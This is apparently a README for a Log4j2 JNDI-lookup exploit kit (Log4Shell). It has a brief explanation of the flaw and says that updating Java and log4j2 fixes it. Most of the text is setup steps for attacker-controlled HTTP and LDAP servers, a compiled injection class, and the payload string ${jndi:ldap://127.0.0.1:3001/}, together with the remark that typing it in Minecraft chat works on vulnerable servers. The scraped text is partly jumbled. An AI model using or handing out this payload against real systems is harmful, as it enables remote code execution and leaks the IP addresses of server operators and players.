log4j2 remote code execution or IP leakage exploit (with examples)
This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes)
However, the logging library for java called log4j2 had JNDILookup, which allowed access to protocols such as LDAP, which allowed code injection in older java versions.
Patched versions of java can prevent code injection, but JNDILookup
makes request to ldap server, which can lead to IP leaks.
The solution is to update Java and log4j2 versions.
cd http-server && npm install
cd ldap-server && npm install
http-server
and ldap-server
bothcd http-server && node index.js
cd ldap-server && node index.js
# This will generate Main.java - required to code injection.
javac Main.java
# You can still use log4j-client in repo for internal testing.
cd log4j-client
gradlew jar
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar
${jndi:ldap://127.0.0.1:3001/}
to any payloads.
(In minecraft, just chatting this will work if exploits are working.)CC0